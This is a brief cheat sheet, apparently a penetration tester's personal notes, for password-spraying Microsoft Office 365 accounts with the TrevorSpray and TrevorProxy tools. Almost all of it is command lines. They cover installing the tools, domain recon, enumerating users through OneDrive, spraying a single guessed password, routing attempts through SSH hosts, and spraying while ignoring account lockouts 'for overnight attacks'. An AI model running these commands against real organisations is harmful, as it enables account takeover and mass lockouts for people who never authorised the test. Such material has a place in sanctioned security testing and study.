A list of tools and resources that I use for password spraying Microsoft products.
Password Spraying Office365
TrevorSpray
# Installationpipinstallgit+https://github.com/blacklanternsecurity/trevorproxypipinstallgit+https://github.com/blacklanternsecurity/trevorspray# Perform recon against a domaintrevorspray--recon $domain# Enumerate users via OneDrivetrevorspray--recon $domain -u $emails --threads3# Spray with a 10 second delay between requeststrevorspray-u $validemails -p'Winter2022!'--delay10# Spray with two robins and the current systemtrevorspray-u $validemails -p'Winter2022!'--sshroot@$robin root@$robin# Spray while ignoring account lockout (good for overnight attacks)trevorspray-u $validemails -p $passwords --ignore-lockouts